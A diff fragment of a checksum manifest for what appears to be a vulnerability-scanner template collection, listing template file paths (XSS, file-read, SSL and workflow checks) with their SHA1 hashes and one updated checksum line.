http/vulnerabilities/other/reddittop-rss-xss.yaml:03df8cb7029692c3157660f0aca9c22ee86884a8 http/vulnerabilities/other/resin-cnnvd-200705-315.yaml:4d3d645b58f506e86281f8dd0b487c34b6f6bbb5 http/vulnerabilities/other/resin-inputfile-fileread.yaml:99d1e9dc54f4ee317305d67f01721d137ddbd9d5 
@@ -7028,7 +7032,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:b3331acaaf83635e0a2917f1d34fac12751dc777 +templates-checksum.txt:8c5aa2ad4577d9ce37eb4de08321af79e42ff3b3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f